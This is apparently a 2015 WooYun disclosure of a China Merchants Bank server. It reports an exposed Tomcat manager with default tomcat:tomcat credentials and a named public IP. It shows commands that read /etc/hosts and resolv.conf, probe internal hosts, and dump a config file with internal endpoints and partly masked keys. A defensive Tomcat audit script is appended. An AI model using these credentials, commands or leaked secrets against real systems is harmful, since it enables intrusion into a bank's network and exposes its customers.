
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0109531

Title: A China Merchants Bank server is vulnerable and can be shelled (bypasses the perimeter firewall and reaches the internal network)

Vendor: China Merchants Bank (招商银行)

Author: 猪猪侠

Submitted: 2015-04-21 21:44

Fixed: 2015-06-05 23:18

Disclosed: 2015-06-05 23:18

Type: weak admin/back-end password

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-21: Details reported to the vendor, awaiting vendor handling
2015-04-21: Vendor confirmed; details disclosed to the vendor only
2015-05-01: Details disclosed to core white hats and domain experts
2015-05-11: Details disclosed to regular white hats
2015-05-21: Details disclosed to intern white hats
2015-06-05: Details disclosed to the public

Brief description:

A China Merchants Bank server is vulnerable and can be shelled (bypasses the perimeter firewall and reaches the internal network); since it is a banking system, I did not dare to go any deeper.

Details:

http://61.152.151.203:8001/manager/html
tomcat:tomcat
A system related to China Merchants Bank's WeChat and bank card services

cmb/card_getCardDetail.action
cmb/card_getCardForWeixin.action


[screenshot: tomcat.png]


cat /etc/resolv.conf
search cmbccd.cmbchina.com
nameserver 10.48.64.6
nameserver 10.48.64.7
nameserver 10.47.1.11
cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
127.0.1.1 SCCWECHAT02101.cmbccd.cmbchina.com SCCWECHAT02101



Proof of vulnerability:

This server is connected to the internal 10.x network:
curl http://10.48.88.56:8088

<html><head><title>Apache Tomcat/6.0.35 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - There is no Action mapped for namespace [/] and action name [] associated with context path [].</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>There is no Action mapped for namespace [/] and action name [] associated with context path [].</u></p><p><b>description</b> <u>The requested resource (There is no Action mapped for namespace [/] and action name [] associated with context path [].) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>


#==================================#
#OAuth
#================================#
Encrypt_Key=cmb**.**
#==================================#
#cmb points red envelope
#==================================#
#==test environment==
#campaign end time
activityEndTime=2015-02-27 00:00:00
#API endpoint ip
ip=http://10.48.**.**:8088
#get jsapi_ticket
jsapi_ticket=http://10.48.**.**:8088/repoints/repoints_getWXjsAPIticket.action
#check whether the user is bound
isBind=/repoints/repoints_isBind.action
#get total points
queryTotalPoints=/repoints/repoints_queryAvaiPoints.action
#get SMS verification code
getCaptcha=/repoints/repoints_getValidateCode.action
#create red envelope
crtRedEnvelope=/repoints/repoints_crtRedEnvelope.action
#get the grabbed red envelope and its details by red envelope id
getREDetails=/repoints/repoints_getREDetailsByREId.action
#get the grabbed red envelope and its details by red envelope id
drawRedEnvelope=/repoints/repoints_drawRedEnvelope.action
#get all red envelopes and their grab details by openid
getAllREPoints=/repoints/repoints_getAllREPointsByOpenid.action
#get the red envelopes grabbed by openid and their details
getDrawRedEnvelope=/repoints/repoints_getRedEnvelopeByOpenId.action
#claim red envelope
accountPoints=/repoints/repoints_accountPoints.action
#==================================#
#WeChat js-sdk
#==================================#
#random string used to generate the signature
noncestr=CMB20**.**lope
#==================================#
#private key
#==================================#
#private key
prikey=**************************************************************************uwRWV8zzjzAc4ylKvr2uY5FmUHn96Lw=
share_page_url=http://pointsbonus.cmbchina.com/bindpoints/bindPointsIndex
redirect_Url=http://www.baidu.com
decrypt_Key=cmbedcba
#yaoyuan.150331
backstage_url=http://10.48.**.**:8088/bindPoints/points_shareRecord.action
<?xml version="1.0" encoding="UTF-8"?>
<root>
<AttentionAwoke>
<!-- resend count -->
<sendNum>3</sendNum>
<comefrom>161</comefrom>
<!-- configuration for "new" -->
<title>官方微信智能语音邀您体验--随时申请调高信用额度--快速定位周边优惠商户、特价影院、招行网点、ATM--让“小招”常驻手机桌面,快速掌握您的用卡信息</title>
<description>3秒查账单、查积分、查额度--随时申请调高信用额度--周边优惠商户、招行网点--让“小招”出现在手机桌面</description>
<picUrl>http://market.cmbchina.com/ccard/weixin/news/20140122/640b.jpg--http://market.cmbchina.com/ccard/weixin/news/20140122/a.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/b.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/c.jpg</picUrl>
<url>http://market.cmbchina.com/ccard/weixin/news/20140122/--http://market.cmbchina.com/ccard/weixin/news/20130916/--http://market.cmbchina.com/ccard/weixin/news/20140120_lbs/--http://market.cmbchina.com/ccard/weixin/news/20140120_kjzm/</url>
<!-- UAT -->
</AttentionAwoke>
<weixingUrl>
<!-- whether to fetch the token from the authentication server -->
<getToken>true</getToken>
<!-- production environment -->
<!-- <newtoken>http://10.48.**.**:8081/system/weixin!gettoken.action</newtoken>
<getToken>http://10.48.**.**:8090/cgi-bin/token</getToken>
<api>http://10.48..**.**:8090/cgi-bin/</api> -->
<!-- test environment -->
<getToken>http://api.weixin.qq.com/cgi-bin/token</getToken>
<api>http://api.weixin.qq.com/cgi-bin/</api>
<newtoken>http://192.168..**.**:8781/system/weixin!gettoken.action
</newtoken>
</weixingUrl>
<CARD>
<page_size>10</page_size>
<page_url>system/card_getBatchCard</page_url>
<get_card_url>http://192.168.**.**:8027/cmb/card_getCardForWeixin.action</get_card_url>
<card_detail_url>http://192.168.**.**:8027/cmb/card_getCardDetail.action</card_detail_url>
<card_info_url>/jsp/card/cardInfo.jsp?wechat_card_js=1</card_info_url>
</CARD>
</root>

Fix recommendation:

Just don't leave this exposed to the external network.
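The two conditions that produced this finding were a Tomcat manager app still carrying a default login and that app being reachable from any source address. The following audit script is an added example for defenders and is not part of the original report; the sample tomcat-users.xml and manager context.xml are constructed, and the weak-password list and the 12-character minimum are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample inputs (not from the report): a tomcat-users.xml that still carries
# the default tomcat/tomcat login, and a manager context.xml with no source-address filter.
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="L8r#vQ2p!m4xT9wz" roles="manager-script"/>
  <user username="guest" password="guest" roles="probe"/>
</tomcat-users>"""
SAMPLE_MANAGER_CONTEXT = '<Context antiResourceLocking="false" privileged="true"/>'

# Assumed lists: vendor defaults commonly left in place, and the roles that can deploy WARs
WEAK_PASSWORDS = {"tomcat", "admin", "password", "manager", "s3cret", "changeit", ""}
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

def _local(tag):
    """Strip the XML namespace so <user> matches with or without the xmlns attribute."""
    return tag.rsplit("}", 1)[-1]

def audit_users(xml_text, min_len=12):
    """Return (username, reason) for every privileged account with a guessable password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if not roles & PRIVILEGED_ROLES:
            continue  # cannot reach the manager app; out of scope for this check
        if pw.lower() in WEAK_PASSWORDS or pw.lower() == name.lower():
            findings.append((name, "default or username-derived password"))
        elif len(pw) < min_len:
            findings.append((name, "password shorter than %d chars" % min_len))
    return findings

def manager_has_address_filter(context_xml):
    """True if the manager Context carries a RemoteAddrValve or RemoteCIDRValve."""
    for el in ET.fromstring(context_xml).iter():
        if _local(el.tag) == "Valve" and any(
                v in el.get("className", "") for v in ("RemoteAddrValve", "RemoteCIDRValve")):
            return True
    return False

if __name__ == "__main__":
    for name, why in audit_users(SAMPLE_USERS_XML):
        print("weak manager account: %s (%s)" % (name, why))
    if not manager_has_address_filter(SAMPLE_MANAGER_CONTEXT):
        print("manager app has no address valve: reachable from any source IP")
```

Run it against a real install by reading conf/tomcat-users.xml and webapps/manager/META-INF/context.xml; an address valve only narrows who can reach the manager and does not replace removing it from internet-facing hosts.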

Copyright notice: when reposting, credit the source 猪猪侠@乌云


Responses

Vendor response:

Severity: High

Rank: 11

Confirmed: 2015-04-21 23:16

Vendor reply:

Thank you for your attention to China Merchants Bank's security.

Latest status:

None yet